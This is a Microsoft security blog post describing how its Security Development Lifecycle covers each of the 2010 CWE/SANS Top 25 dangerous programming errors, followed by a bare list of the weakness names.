Get on-the-go access to the latest insights featured on our Trustworthy Computing blogs.
Hi, Michael here,
As you might be aware, a collaboration of industry experts and academia worked together on the CWE/SANS Top 25 Most Dangerous Programming Errors for a second year to define and describe the most significant programming errors that can lead to some of the most serious software vulnerabilities. As we did last year, Microsoft was involved helping define the CWE/SANS Top 25 for 2010.
As the process to define the Top 25 started to draw to a close and the draft top 40 candidates were selected to be whittled down to 25, we decided, as we did in 2009, to see how the SDL processes and tasks map to the Top 25.
As we expected, the SDL maps very nicely to the 2010 Top 25, just as it did in 2009. Every one of the Top 25 is covered by one or more SDL requirements, and most of them are also covered by an automated SDL verification tool or secure coding library. Even CWE 98, "PHP File Inclusion," is covered by the SDL in our required security training classes, which is especially remarkable when you consider that virtually no PHP code is written at Microsoft!
The reason that we address issues like PHP file inclusion in the SDL is that we don't simply wait for new vulnerability taxonomies to be released and then rush to add mitigations to our security processes; rather, we structure the SDL to provide developers with fundamentally sound, secure programming practices. As a result, we cover not just the known vulnerabilities of today (like the Top 25) but also many of the unknown vulnerabilities that will be discovered tomorrow. The fact that all of the Top 25 are addressed by the SDL is a great validation, but it is the result of the content of our process and not the cause.
Library, tool or code gen Fix?
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Improper Validation of Array Index
Incorrect Calculation of Buffer Size
Buffer Access with Incorrect Length Value
Information Exposure Through an Error Message
Improper Check for Exceptional Conditions
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
Unrestricted File Upload
Allocation of Resources Without Limits or Throttling
Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')
Failure to Preserve Web Page Structure ('Cross site Scripting')
Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection')
Cross Site Request Forgery (CSRF)
Download of Code Without Integrity Check
URL Redirection to Untrusted Site ('Open Redirect')
Integer Overflow or Wraparound
Reliance on Untrusted Inputs in a Security Decision
Improper Access Control (Authorization)
Missing Authentication for Critical Function
Missing Encryption of Sensitive Data
Use of a Broken or Risky Cryptographic Algorithm
Incorrect Permission Assignment for Critical Resource
Use of Hard coded Credentials